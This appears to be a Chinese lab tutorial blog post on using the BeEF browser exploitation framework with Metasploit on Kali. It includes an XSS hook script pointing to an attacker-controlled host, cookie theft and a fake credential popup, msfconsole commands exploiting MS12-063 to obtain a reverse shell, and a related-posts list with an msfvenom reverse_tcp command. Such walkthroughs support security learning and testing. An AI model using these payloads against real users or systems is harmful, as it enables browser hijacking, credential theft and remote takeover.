Kali BeEF MSF的使用
0x00 BeEF
BeEF( The Browser Exploitation Framework)
是由Wade Alcorn 在2006年开始创建的,是由ruby语言开发的专门针对浏览器攻击的框架。BeeF是前欧美最流行的web框架攻击平台,kali 集成BeEf,而且BeEf有很多好使的payload。例如BeEF可以通过一段编制好的javascript控制目标主机的浏览器,通过浏览器拿到各种信息并且扫描内网信息,同时能够配合metasploit进一步渗透主机。
不过在目前,BeEF使用的人比较少,并且在新版Kali中已经没有默认安装了,这里简单记录下BeEF的使用。
测试环境:任意存在XSS
漏洞的站点及kali2019
;
注意如果是在新版kali中则可以使用apt-get install beef-xss
进行安装。
0x02 BeEF的使用
直接在命令行输入xss-beef
即可使用,我这里多了一个提示,需要改变缺省密码,它的缺省密码是beef/beef
。
当程序启动完毕后,会自动打开浏览器,出现登陆界面。
当然也可以根据之前的Log信息进行操作,上面也有写登陆的地址,直接登陆这个地址也是可以的。
接下来,将上面的Hook
打入到XSS
漏洞环境中,这里要记得将<IP>
换成kali
的IP地址,这里拿都知道的DVWA靶场
举例。
<script src="http://192.168.181.141:3000/hook.js"></script>
直接插进去就行了。
然后登陆beef查看上线主机。
点击上线主机后,可以看到一些对应的信息。
点击command
可以看到支持的攻击模块
这里由于软件有较久没有更新模块内容,所以有些功能可能无法使用的,可以通过命令前面的颜色来判断
- 绿色:命令模块可以在目标浏览器上运行,且用户不会感到任何异常
- 橙色:命令模块可以在目标浏览器上运行,但是用户可能会感到异常(比如可能会有弹窗,提示,跳转 等)
- 灰色:命令模块尚未针对此目标进行验证,即不知道能否可运行
- 红色:命令模块不适用于此目标
这里拿Browser
举例。
使用绿色的Get Cookie
点击Execute
可以看到对应的信息
再拿橙色的Redirect Browser
举例
点击Execute
后用户界面会跳转到百度。
显示命令执行成功,查看客户端页面。
已经跳转成功,还可以使用社工模块中的弹窗等。
别说,还挺像的。。
输入后,可以在后台收到用户名密码信息
另外BeEF还可以联动MSF一起使用,不过具体功能还得大家自行研究了,这里贴下联动的方法。
0x03 MSF+BeEF
首先更改BeEF的第一个配置文件,开启MSF的加载模块。
vim /usr/share/beef-xss/config.yaml
另外需要修改扩展模块中的MSF配置文件
vim /usr/share/beef-xss/extensions/metasploit/config.yaml
保证红框内的配置即可,接着进MSF加载模块
load msgrpc ServerHost=127.0.0.1 User=msf Pass=abc123
这里区分大小写,密码在刚刚的配置文件里面有
最后一步,去beef-xss
目录下通过./xss-beef
启动才行。
cd /usr/share/beef-xss/
./beef
再次登陆BeEF
就可以看到已经加载了MSF
模块了。
这里就可以通过加载好的msf
模块直接打了,不过找了一圈也没看到可以直接利用的。。。这大概就是不香了的原因吧,最后换个机器xp
玩一下。
0x04 MSF+BeEF实例
MSF
使用MS12-063
漏洞,配合BeEF
完成getshell
由于MS12-063
针对IE7/8/9
有效果,这里客户机用XP
测试,哎,用这么老的机器测试就是玩。
XP
访问存储型XSS
上线至BeEF
。
接着选择msf
模块中的ms12-063
命令模块,填入对应的payload
直接执行,本以为完事了,结果。。。
一直loading
,shell
拿到,没办法只能去msf
中玩了。
#后来想了下也测试过了,其实这里还是去`rediresct brower`那里去控制客户端访问一次生成的页面就可以了。
#比如这里需要让他访问http://192.168.181.141:8888,才能正常上线
#而且正常上线后,这个地方还是会loading,也得去msf中才能看到shell,感觉没啥意义。。。
msf6 > search ms12-063Matching Modules
================# Name Disclosure Date Rank Check Description- ---- --------------- ---- ----- -----------0 exploit/windows/browser/ie_execcommand_uaf 2012-09-14 good No MS12-063 Microsoft Internet Explorer execCommand Use-After-Free Vulnerability
接着进入模块后进行设置
msf6 > use exploit/windows/browser/ie_execcommand_uaf
msf6 exploit(windows/browser/ie_execcommand_uaf) > set uripath /
uripath => /
msf6 exploit(windows/browser/ie_execcommand_uaf) > exploit
[*] Exploit running as background job 3.
[*] Exploit completed, but no session was created.[*] Started reverse TCP handler on 192.168.181.141:4445
[*] Using URL: http://0.0.0.0:8080/
[*] Local IP: http://192.168.181.141:8080/
[*] Server started.
接着在BeEF
中使用Redirect Brower
功能让客户机访问http://192.168.181.141:8080/
。
再去看MSF
,就上线了。
0x05 闲语
没想到上周临时的想法试着去申请下博客专家,今天就收到消息,来了来了,CSDN认证博客专家
,GOT it,新的开始,继续加油!
Kali BeEF MSF的使用相关推荐
- 使用Beef劫持客户端浏览器并进一步使用Beef+msf拿客户端shell
利用Beef劫持客户端浏览器 环境: 1.Kali(使用beef生成恶意代码,IP:192.168.114.140) 2.一台web服务器(留言板存在XSS跨站脚本漏洞,IP:192.168.11 ...
- kali利用msf工具对ms08-067漏洞入侵靶机(win xp2)
kali利用msf工具对ms08-067漏洞入侵靶机(win xp2) 漏洞简介 MS08-067漏洞将会影响Windows 2000/XP/Server 2003/Vista/Server 2008 ...
- 利用kali的msf提取汇编机器码(shellcode)
对于提取小段汇编的机器码,kali的msf提取汇编机器码非常方便 比如提取下面小段的汇编机器码 push 5 ;5=SW_SHOWpush eaxmov eax,0x755bdab0call eax ...
- Kali利用MSF入侵安卓手机
kali利用MSF入侵安卓手机 一.什么是MSF 二.演示环境 三.渗透过程 1.使用root权限 2.生成可执行木马文件 3.将生成的后门文件,放入靶机 4. 运行msfconsole命令 5.参数 ...
- kali 利用msf通过win7永恒之蓝漏洞获取权限
kali 利用msf通过win7永恒之蓝漏洞获取权限 老师留的信息安全课大作业:要通过漏洞来实现原本权限做不到的事 本菜狗就选了永恒之蓝漏洞来应付下,也是第一次搞这种网安类型的实验,下面正文的描述中应 ...
- kali使用msf简单制作木马
命令: 废话不多说,直接上命令: msfvenom -a x86 -p windows/meterpreter/reverse_tcp lhost=192.168.10.166 lport=4444 ...
- Kali利用msf对MS10_061漏洞进行渗透测试
注意事项: kail首次打开metasploit,会初始化数据,可能会有点慢,请耐心等待! 本文仅供学习漏洞渗透测试,不得用于其他非法用途,否则造成的任何后果自负!!! 1. Metasploit简介 ...
- kali利用MSF对ms17_010漏洞入侵win7
步骤一:实验环境的搭建 攻击机:kali(2021.1版本) 靶机:win7 旗舰版 sp1 在虚拟机里安装好上面两个环境后分别都打开(安装的步骤这里就不演示了,今天我们主要演示的是去入侵它) 打开安 ...
- kali利用MSF对永恒之蓝漏洞入侵windows7
warning 本文目的并不是教会学者入侵win7主机, 而是加强防范 kali入侵win7 步骤一:实验环境的搭建 攻击机:kali(2022.3版本) 靶机:win7 专业版 sp1 x64位 安 ...
- Kali之MSF的MS08-067漏洞复现详解
1.MSF初识: MSF即Metasploit Framework,是一个综合性的渗透测试工具,集成信息收集.漏洞扫描.漏洞利用以及提权等功能的工具. 目前安装的kali都自带MSF,可以直接在图形界 ...
最新文章
- 并查集 ---- 扩展域并查集判二分图 + 循环模拟字典树 The 2020 ICPC Asia Macau Regional Contest C. Club Assignment (详解)
- java之Thread.sleep(long)与object.wait()/object.wait(long)的区别及相关概念梳理(good)
- ASP.NET的状态管理
- python写扫雷脚本_Python自动扫雷实现方法
- BZOJ 3436 小K的农场 差分约束
- 面试官:为什么 HashMap 的加载因子是0.75?
- display:none;与visibility:hidden;的区别
- synchronized同步方法概述
- JAVA与DOM解析器基础 学习笔记
- flask request类
- tensorflow如何微调时如何只训练后两层_TensorFlow官方发布剪枝优化工具:参数减少80%,精度几乎不变...
- 好看的php表格样式,分享四个非常好看实用的CSS样式表格
- vue 商城浏览足迹_vue实现用户获取浏览记录功能
- matlab上一次计算结果影响,matlab运行结果跟手算结果不一致怎么办
- linux各种命令手册
- asa 防火墙拦截了https_Cisco ASA防火墙的URL过滤控制
- 《Python数据结构与算法分析》第一章课后习题
- SPSS22 安装后不可用 没有出现授权 不显示工具栏
- v-model原理总结
- 如何使用m3u8格式下载快手直播回放的视频?自动转换MP4